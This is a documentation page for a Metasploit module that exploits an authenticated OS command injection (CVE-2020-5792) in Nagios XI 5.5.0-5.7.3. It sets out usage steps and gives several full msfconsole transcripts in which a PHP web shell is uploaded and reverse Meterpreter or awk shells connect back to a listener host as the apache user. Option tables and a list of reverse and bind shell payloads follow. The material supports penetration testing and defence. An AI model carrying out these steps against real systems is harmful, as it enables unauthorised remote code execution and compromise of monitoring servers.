Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/nagios_xi_snmptrap_authenticated_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection
Module: exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
Source code: modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
Disclosure date: 2020-10-20
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): x86, x64, cmd
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-5792

This module exploits an OS command injection vulnerability in includes/components/nxti/index.php that enables an authenticated user with admin privileges to achieve remote code execution as the apache user. The module uploads a simple PHP shell via includes/components/nxti/index.php to includes/components/autodiscovery/jobs/<php_shell> and then executes the payload as the apache user via an HTTP GET request to includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd> Valid credentials for a Nagios XI admin user are required. This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
msf exploit(nagios_xi_snmptrap_authenticated_rce) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • PASSWORD: Password to authenticate with

Knowledge Base


Vulnerable Application


This module exploits an OS command injection vulnerability (CVE-2020-5792) in includes/components/nxti/index.php that enables an authenticated user with admin privileges to achieve remote code execution as the apache user.

The module's check method takes advantage of the Msf::Exploit::Remote::HTTP::NagiosXi mixin in order to authenticate to the target and obtain the Nagios XI version number, which is then used to check if the target is version 5.5.0-5.7.3 and therefore vulnerable.

Next, the module uploads a simple PHP shell via includes/components/nxti/index.php to includes/components/autodiscovery/jobs/<php_shell> and then executes the payload via a HTTP GET request to includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>. This will will result in the command specified by the attacker, aka <cmd>, being executed as the apache user.

The module supports linux/x64 and linux/x86 payloads (target 0) as well as cmd/unix payloads (target 1), However, the only reliable cmd/unix payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_awk, cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl.

Valid credentials for a Nagios XI admin user are required. This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.

Vulnerable software for testing is available here. Detailed installation instructions are available here and an official video tutorial is available here.

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
  3. Do: set RHOSTS [IP]
  4. Do: set USERNAME [username for the Nagios XI account with administrative privileges]
  5. Do: set PASSWORD [password for the Nagios XI account with administrative privileges]
  6. Do: set target [target]
  7. Do: set payload [payload]
  8. Do: set LHOST [IP]
  9. Do: exploit

Options


FINISH_INSTALL

If this is set to true, the module will try to finish installing Nagios XI on targets where the installation has not been completed. This includes signing the license agreement. The default value is false.

PASSWORD

The password for the Nagios XI account to authenticate with.

TARGETURI

The base path to Nagios XI. The default value is /nagiosxi/.

USERNAME

The username for the Nagios XI account to authenticate with. The default value is nagiosadmin.

Targets


Id  Name
--  ----
0   Linux (x86/x64)
1   CMD

Scenarios


Nagios XI 5.7.3 running on CentOS 7 - Linux target

msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nagiosadmin
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so.
                                              This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php?i=`
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (773/773 bytes)
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54824) at 2021-04-01 12:36:52 -0400

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)

Nagios XI 5.7.3 running on CentOS 7 - CMD target

msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nagiosadmin
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set target 1
target => 1
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/WwsImAkDSM.php?h=`
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.16:43831) at 2021-04-01 12:37:29 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)

Nagios XI 5.6.5 running on CentOS 7 - Linux Target

msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
LHOST => 172.21.163.243
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
RHOSTS => 172.21.168.44
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
[*] The module will wait for 5 seconds and retry.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[*] 172.21.168.44:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.21.163.243:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/KBRRRebd.php?z=`
[*] Sending stage (980808 bytes) to 172.21.168.44
[*] Command Stager progress - 100.00% done (773/773 bytes)
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
[*] Meterpreter session 1 opened (172.21.163.243:4444 -> 172.21.168.44:35554) at 2021-04-20 13:52:24 -0500

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > pwd
/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.21.168.44 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so. This includes s
                                              igning the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          172.21.168.44    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                              cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) >

Nagios XI 5.6.5 running on CentOS 7 - CMD Target

msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
LHOST => 172.21.163.243
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
RHOSTS => 172.21.168.44
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
[*] The module will wait for 5 seconds and retry.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[*] 172.21.168.44:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so. This includes s
                                              igning the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          172.21.168.44    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                              cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.21.163.243:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php
[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php?v=`
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php
[*] Command shell session 2 opened (172.21.163.243:4444 -> 172.21.168.44:40205) at 2021-04-20 13:57:48 -0500

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) context=system_u:system_r:httpd_t:s0
whoami
apache

Go back to menu.

Msfconsole Usage


Here is how the linux/http/nagios_xi_snmptrap_authenticated_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce

[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show info

       Name: Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection
     Module: exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
   Platform: Linux, Unix
       Arch: x86, x64, cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-10-20

Provided by:
  Chris Lyne
  Erik Wynter

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Linux (x86/x64)
  1   CMD

Check supported:
  Yes

Basic options:
  Name            Current Setting  Required  Description
  ----            ---------------  --------  -----------
  FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes signing the license agreement.
  PASSWORD                         yes       Password to authenticate with
  Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT           80               yes       The target port (TCP)
  SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT         8080             yes       The local port to listen on.
  SSL             false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
  URIPATH                          no        The URI to use for this exploit (default is random)
  USERNAME        nagiosadmin      yes       Username to authenticate with
  VHOST                            no        HTTP server virtual host

Payload information:

Description:
  This module exploits an OS command injection vulnerability in 
  includes/components/nxti/index.php that enables an authenticated 
  user with admin privileges to achieve remote code execution as the 
  `apache` user. The module uploads a simple PHP shell via 
  includes/components/nxti/index.php to 
  includes/components/autodiscovery/jobs/<php_shell> and then executes 
  the payload as the `apache` user via an HTTP GET request to 
  includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd> 
  Valid credentials for a Nagios XI admin user are required. This 
  module has been successfully tested against Nagios XI 5.7.3 running 
  on CentOS 7.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-5792

Module Options


This is a complete list of options available in the linux/http/nagios_xi_snmptrap_authenticated_rce exploit:

msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes signing the license agreement.
   PASSWORD                         yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)

Advanced Options


Here is a complete list of advanced options supported by the linux/http/nagios_xi_snmptrap_authenticated_rce exploit:

msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show advanced

Module advanced options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_i
                                                                                         nvokewebrequest)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/nagios_xi_snmptrap_authenticated_rce module can exploit:

msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux (x86/x64)
   1   CMD

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/nagios_xi_snmptrap_authenticated_rce exploit:

msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
